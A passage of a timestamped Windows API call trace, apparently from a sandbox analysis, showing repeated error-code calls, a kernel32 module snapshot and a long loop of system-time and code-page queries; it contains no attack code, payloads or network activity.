(dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.748] SetLastError (dwErrCode=0x0) [0076.748] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.749] SetLastError (dwErrCode=0x0) [0076.749] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.750] SetLastError (dwErrCode=0x0) [0076.750] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.751] SetLastError (dwErrCode=0x0) [0076.751] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] SetLastError (dwErrCode=0x0) [0076.752] GetLastError () returned 0x0 [0076.752] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0076.753] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0076.753] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0076.753] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0076.758] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0076.758] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0076.758] GetTickCount () returned 0x11596f3 [0076.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.758] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.758] GetACP () returned 0x4e4 [0076.758] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.759] GetACP () returned 0x4e4 [0076.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.759] GetACP () returned 0x4e4 [0076.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.759] GetACP () returned 0x4e4 [0076.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.759] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.759] GetACP () returned 0x4e4 [0076.759] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.760] GetACP () returned 0x4e4 [0076.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.760] GetACP () returned 0x4e4 [0076.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.760] GetACP () returned 0x4e4 [0076.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.760] GetACP () returned 0x4e4 [0076.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.760] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.760] GetACP () returned 0x4e4 [0076.760] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.761] GetACP () returned 0x4e4 [0076.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.761] GetACP () returned 0x4e4 [0076.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.761] GetACP () returned 0x4e4 [0076.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.761] GetACP () returned 0x4e4 [0076.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.761] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.761] GetACP () returned 0x4e4 [0076.761] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.762] GetACP () returned 0x4e4 [0076.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.762] GetACP () returned 0x4e4 [0076.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.762] GetACP () returned 0x4e4 [0076.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.762] GetACP () returned 0x4e4 [0076.762] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.762] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.762] GetACP () returned 0x4e4 [0076.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.763] GetACP () returned 0x4e4 [0076.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.763] GetACP () returned 0x4e4 [0076.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.763] GetACP () returned 0x4e4 [0076.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.763] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.764] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.764] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.764] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.764] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.764] GetACP () returned 0x4e4 [0076.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.765] GetACP () returned 0x4e4 [0076.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.765] GetACP () returned 0x4e4 [0076.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.765] GetACP () returned 0x4e4 [0076.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.765] GetACP () returned 0x4e4 [0076.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.765] GetACP () returned 0x4e4 [0076.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.766] GetACP () returned 0x4e4 [0076.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.766] GetACP () returned 0x4e4 [0076.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.766] GetACP () returned 0x4e4 [0076.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.766] GetACP () returned 0x4e4 [0076.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.767] GetACP () returned 0x4e4 [0076.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.767] GetACP () returned 0x4e4 [0076.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.767] GetACP () returned 0x4e4 [0076.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.767] GetACP () returned 0x4e4 [0076.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.767] GetACP () returned 0x4e4 [0076.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.768] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.769] GetACP () returned 0x4e4 [0076.769] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.770] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.770] GetACP () returned 0x4e4 [0076.770] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.771] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.771] GetACP () returned 0x4e4 [0076.771] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.771] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.771] GetACP () returned 0x4e4 [0076.771] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.771] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.771] GetACP () returned 0x4e4 [0076.771] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.771] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.771] GetACP () returned 0x4e4 [0076.771] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.771] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.771] GetACP () returned 0x4e4 [0076.771] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.772] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.772] GetACP () returned 0x4e4 [0076.831] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 